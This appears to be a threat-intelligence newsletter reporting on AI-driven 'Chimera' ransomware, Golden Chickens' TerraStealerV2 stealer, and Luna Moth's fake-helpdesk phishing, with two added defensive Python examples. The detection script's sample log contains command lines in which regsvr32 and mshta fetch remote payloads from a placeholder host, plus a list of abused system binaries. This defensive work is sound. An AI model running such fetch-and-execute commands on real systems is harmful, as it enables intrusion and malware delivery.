TRENDING TOPICS MAY 05, 2025

AI-Powered Chimera Malware Cripples Small Business in Coordinated Cross-Platform Attack 

A small e-commerce business, X Business, recently fell victim to a fast-moving cyberattack powered by an advanced AI-driven malware called Chimera. What began as a routine update to their inventory system escalated in under half a day, resulting in a complete shutdown of operations. Customer transactions stopped, employee accounts were disabled, and a $250,000 cryptocurrency ransom demand followed, threatening to leak sensitive customer data. Chimera’s attack vector combined zero-day exploits, code mutation, and cross-platform compatibility, making it highly evasive and effective. On Windows, it abused the Print Spooler service; on macOS, it bypassed Gatekeeper by forging valid code signatures during execution. Social engineering was used to distribute the payload, with spoofed internal messages over email and Slack tricking staff into triggering the infection. The malware hid in plain sight, mimicking normal system processes until the damage was already done. The business’s recovery process spanned 48 hours, requiring external cybersecurity support and a layered response strategy. EDR platforms were used to detect Chimera’s dynamic behavior and reverse its impact across compromised devices. Data was restored from secure offline backups using solutions designed for both Windows and macOS environments. Patching and remediation were done immediately, closing off the vulnerabilities exploited during the intrusion. Network access controls were overhauled, replacing traditional trust models with Zero Trust to limit internal movement. DNS and domain filtering tools were deployed to prevent callback communications from recurring. The incident exposed how underprepared small businesses often are for targeted, sophisticated attacks and highlighted the need for proactive defense. Strategies like segmented backups, AI-assisted monitoring, and regular employee training must become the baseline, not the exception.

Golden Chickens Expand Toolkit with TerraStealerV2 and TerraLogger 

Golden Chickens, also known as Venom Spider, is a financially motivated cybercrime group active since 2018 and best known for offering malware under a malware-as-a-service (MaaS) model. The group is associated with various modular attack tools, including the infamous More_eggs malware and its variants, often distributed through phishing campaigns targeting corporate environments. Operating under the online persona “badbullzvenom,” which is believed to be jointly managed by individuals based in Canada and Romania, Golden Chickens has built a reputation for developing stealthy, adaptable payloads designed for credential theft, access operations, and post-exploitation activities. Their tools are frequently delivered using Windows shortcuts (LNKs), malicious installers, and trusted system processes, making detection difficult. This group’s malware has consistently targeted high-value enterprise users, using social engineering and obfuscation tactics to avoid traditional defenses. Their latest additions, TerraStealerV2 and TerraLogger, reflect ongoing development to expand their reach and refine existing capabilities. TerraStealerV2 is built to extract browser-stored credentials, cryptocurrency wallet information, and browser extension data. It’s distributed in multiple formats—including EXE, DLL, MSI, and LNK—and the payload is retrieved from an external domain using Microsoft’s OCX framework. Though designed to steal Chrome credentials, it cannot bypass recent Application Bound Encryption (ABE) protections, indicating that the malware is either still being tested or not yet fully adapted. It uses built-in Windows tools like regsvr32.exe and mshta.exe for stealth and transmits stolen data to Telegram and its hosting domain. TerraLogger, on the other hand, is a rudimentary keylogger that lacks data exfiltration or command-and-control features, suggesting it is either in early development or intended to work in conjunction with other tools.
These additions come amid broader competition among threat actors and updated stealers, pushing toward faster, more efficient credential theft and data exfiltration at scale. 
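The behavior described above (regsvr32.exe or mshta.exe pulling content from an external domain) is something a defender can hunt for in process-creation telemetry. The following is an added detection example, not code from the write-up or from any vendor; the `key=value|key=value` log format, the `payload.example` domain and the sample events are all constructed for illustration.

```python
import re
from dataclasses import dataclass

LOLBINS = {"regsvr32.exe", "mshta.exe"}  # built-in binaries the write-up names as abused
URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)  # remote content on the command line

@dataclass
class Finding:
    host: str
    image: str
    url: str
    cmdline: str

def parse_event(line):
    """Parse one constructed 'key=value|key=value' process-creation record."""
    fields = {}
    for part in line.strip().split("|"):
        key, _, value = part.partition("=")
        fields[key.strip()] = value.strip()
    return fields

def image_name(path):
    """Normalise a full image path (either slash style, any case) to a file name."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def detect(lines):
    """Flag regsvr32/mshta launches whose command line carries a remote URL."""
    findings = []
    for line in filter(str.strip, lines):
        ev = parse_event(line)
        image = image_name(ev.get("image", ""))
        if image not in LOLBINS:
            continue
        for url in URL_RE.findall(ev.get("cmdline", "")):
            findings.append(Finding(ev.get("host", "?"), image, url, ev.get("cmdline", "")))
    return findings

# Constructed process-creation events (not real telemetry); payload.example is a placeholder.
SAMPLE_LOG = """\
host=WS01|image=C:\\Windows\\System32\\regsvr32.exe|cmdline=regsvr32.exe /s "C:\\Program Files\\Vendor\\ctl.ocx"
host=WS02|image=C:\\Windows\\System32\\regsvr32.exe|cmdline=regsvr32.exe /s https://payload.example/update.ocx
host=WS03|image=C:\\Windows\\SysWOW64\\MSHTA.EXE|cmdline=mshta.exe https://payload.example/loader.hta
host=WS04|image=C:\\Windows\\explorer.exe|cmdline=explorer.exe https://intranet.example/
"""

for f in detect(SAMPLE_LOG.splitlines()):
    print(f"[{f.host}] {f.image} fetched {f.url}: {f.cmdline}")
```

Only WS02 and WS03 are flagged: a local OCX registration and a browser-bound URL from explorer.exe both pass, which is the precision a rule like this needs before it is wired into alerting.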

Luna Moth Expands Phishing Campaigns with Fake Helpdesk Domains and AI Chatbots 

The Luna Moth threat group, tracked under names including Silent Ransom Group, UNC3753, and Storm-0252, has significantly escalated its phishing operations since March 2025. The group uses fake IT support domains crafted to mimic legitimate helpdesk portals closely. These domains follow predictable patterns, typically combining a company name with “help” or “helpdesk” and using registrars like GoDaddy and nameservers from domaincontrol.com. The group sends phishing emails instructing recipients to call fake helpdesk numbers, where victims are guided into credential theft or remote access installation. One notable tactic involves embedding AI-powered chatbots on spoofed support pages to simulate real-time IT support. Victims are then tricked into installing remote access tools such as AnyDesk or ScreenConnect, granting attackers direct control without dropping any malware. This hands-on method bypasses traditional email filters and security tools by shifting the attack surface from inboxes to human interaction. EclecticIQ and Silent Push investigations have confirmed that over 50 domains have been registered under this scheme, primarily aimed at U.S.-based law firms and financial institutions. Legal services account for over 40% of identified targets, highlighting the attackers’ focus on data-rich, high-trust environments. After gaining access, attackers use legitimate tools to exfiltrate sensitive files and issue ransom demands ranging from $1 million to $8 million, leveraging a leak site to pressure victims. Security teams are encouraged to implement domain monitoring using specific regex patterns, registrar and nameserver filters, and registration date criteria to flag suspicious domains early. Regular audits for unexpected remote access tools and staff education around callback phishing scenarios are now critical defenses. 
Luna Moth’s shift to infrastructure-based deception, combined with AI-enhanced social engineering, reflects a growing trend of blending technical and psychological tactics to bypass perimeter defenses. The scale and precision of this campaign suggest it is far from over and likely to expand further across industries handling sensitive or regulated data. 
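The domain-monitoring criteria the write-up recommends (company name plus "help" or "helpdesk", GoDaddy as registrar, domaincontrol.com nameservers, registration since March 2025) can be turned into a simple triage score over a newly-registered-domain feed. This is an added example, not code from EclecticIQ, Silent Push or the write-up; the TLD list, the weights, the threshold and the sample WHOIS-style records are assumptions made for illustration.

```python
import re
from datetime import date

# Pattern from the write-up: company name + "help"/"helpdesk", optionally hyphenated.
# The TLD list and the scoring weights are assumptions made for this example.
HELPDESK_RE = re.compile(r"^(?P<brand>[a-z0-9]+?)-?(?:helpdesk|help)\.(?:com|net|org|us)$")
CAMPAIGN_START = date(2025, 3, 1)  # escalation began March 2025 per the write-up

def brand_token(domain):
    """Company-name token if the domain follows the fake-helpdesk pattern, else None."""
    m = HELPDESK_RE.match(domain.lower().rstrip("."))
    return m.group("brand") if m else None

def score_domain(rec, watched_brands):
    """Weighted score and reasons for one WHOIS-style record; brand match weighs most."""
    brand = brand_token(rec["domain"])
    if brand is None:
        return 0, []
    hits = [(1, f"helpdesk naming pattern (brand token '{brand}')")]
    if brand in {b.lower() for b in watched_brands}:
        hits.append((2, "brand token is a monitored company name"))
    if "godaddy" in rec.get("registrar", "").lower():
        hits.append((1, "registrar GoDaddy"))
    if any(ns.lower().endswith("domaincontrol.com") for ns in rec.get("nameservers", [])):
        hits.append((1, "domaincontrol.com nameservers"))
    if rec.get("created") and rec["created"] >= CAMPAIGN_START:
        hits.append((1, f"registered on or after {CAMPAIGN_START.isoformat()}"))
    return sum(w for w, _ in hits), [why for _, why in hits]

def triage(records, watched_brands, threshold=4):
    """(domain, score, reasons) for records at or above threshold, highest score first."""
    flagged = [(r["domain"], *score_domain(r, watched_brands)) for r in records]
    return sorted((f for f in flagged if f[1] >= threshold), key=lambda f: -f[1])

# Constructed records standing in for a newly-registered-domain feed (not real domains).
SAMPLE_RECORDS = [
    {"domain": "examplelaw-helpdesk.com", "registrar": "GoDaddy.com, LLC",
     "nameservers": ["ns01.domaincontrol.com"], "created": date(2025, 4, 14)},
    {"domain": "examplelawhelp.net", "registrar": "Other Registrar, Inc.",
     "nameservers": ["dns1.otherdns.example"], "created": date(2025, 3, 20)},
    {"domain": "helpdesk.examplelaw.com", "registrar": "Other Registrar, Inc.",
     "nameservers": ["ns1.examplelaw.com"], "created": date(2019, 6, 1)},
    {"domain": "shop-help.com", "registrar": "GoDaddy.com, LLC",
     "nameservers": ["ns51.domaincontrol.com"], "created": date(2024, 11, 2)},
]

for domain, score, reasons in triage(SAMPLE_RECORDS, ["ExampleLaw"]):
    print(f"{domain} score={score}: " + "; ".join(reasons))
```

The organisation's own legitimate `helpdesk.examplelaw.com` subdomain scores zero, and an unrelated older "help" domain stays below the threshold even though it shares the registrar and nameservers, so the brand token does the discriminating work.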

💡 Hunter Strategy encourages our readers to look for updates in our daily Trending Topics and on Twitter.